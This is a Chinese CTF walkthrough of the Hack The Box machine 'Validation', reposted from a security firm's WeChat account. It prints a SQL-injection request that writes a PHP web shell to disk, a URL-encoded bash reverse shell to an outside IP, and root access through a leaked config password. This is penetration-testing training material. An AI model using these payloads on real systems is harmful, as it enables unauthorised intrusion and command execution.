0x01 靶场描述
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。Validation特性如图:
0x02 靶场复现
知识点: 端口/漏洞扫描、sql注入写入webshell、查找配置信息提权
一、端口/漏洞扫描、sql注入写入webshell
1.使用nmap扫描,发现该目标开启了22、80、5000等端口
nmap -A -sS -sC -sV 10.10.11.116 #-A强力扫描 -sS SYN扫描 -sV识别服务版本 -sC调用脚本扫描
2.访问80端口,sql注入写入webshell
POST / HTTP/1.1
Host: 10.10.11.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://10.10.11.116
Cookie: user=098f6bcd4621d373cade4e832627b4f6
Connection: close
Referer: http://10.10.11.116/
Upgrade-Insecure-Requests: 1
username=test&country=Brazil' union select '<?php SYSTEM($_REQUEST['cmd']); ?>' into outfile '/var/www/html/shell.php';-- +
3.反弹shell,得到一个shell
1.监听shell
nc -lvnp 7777
2.反弹shell(需要url编码)
http://10.10.11.116/shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.3%2F7777%200%3E%261%22
3.查看user的flag
cat /home/htb/user.txt
二、查找配置信息提权
1.查找到服务器存在config.php,其中包含账户密码
$username = "uhc";
$password = "uhc-9qual-global-pw";
2.使用该密码登录,获取root权限
1.切换用户:
su - root
uhc-9qual-global-pw
2.查看root的flag
cat /root/root.txt
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):Hack The Box-Validation
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论